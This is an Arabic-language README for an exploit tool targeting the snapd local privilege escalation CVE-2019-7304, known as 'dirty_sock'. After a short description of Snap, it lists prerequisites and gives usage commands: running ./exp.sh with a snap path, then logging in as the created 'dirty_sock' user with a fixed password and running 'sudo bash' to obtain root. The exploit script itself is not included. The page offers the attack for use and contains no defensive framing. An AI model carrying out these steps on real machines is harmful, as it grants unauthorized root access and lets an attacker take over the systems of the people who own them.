
تنفيذ آخر لاستغلال تصعيد الامتيازات في linux عبر snap(d) (CVE-2019-7304)
تنفيذ آخر لاستغلال تصعيد الامتيازات في لينكس عبر snap(d) (CVE-2019-7304)
Snap هو نظام تغليف ونشر للبرمجيات طوّره Canonical لـأنظمة التشغيل التي تستخدم نواة لينكس. الحزم، التي تُسمى snaps، والأداة المستخدمة للتعامل معها، snapd، تعمل عبر مجموعة من توزيعات لينكس وتسمح لمطوّري البرمجيات الأصليين (upstream) بتوزيع تطبيقاتهم مباشرةً على المستخدمين. تُعد Snaps تطبيقات مكتفية بذاتها تعمل في بيئة معزولة (sandbox) مع وصول مُتحكَّم فيه إلى النظام المضيف. أُصدر Snap في البداية لتطبيقات السحابة[1] لكنه نُقل لاحقًا ليعمل مع أجهزة إنترنت الأشياء[3][4] وتطبيقات سطح المكتب[5][6] أيضًا.
dirty_sock: تصعيد امتيازات لينكس (عبر snapd)
- تثبيت snap على النظام
- لديك صلاحية sudo على snap مع أو بدون كلمة مرور
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
ثم يمكنك استخدام
su - dirty_sock
dirty_sock (as password)
sudo bash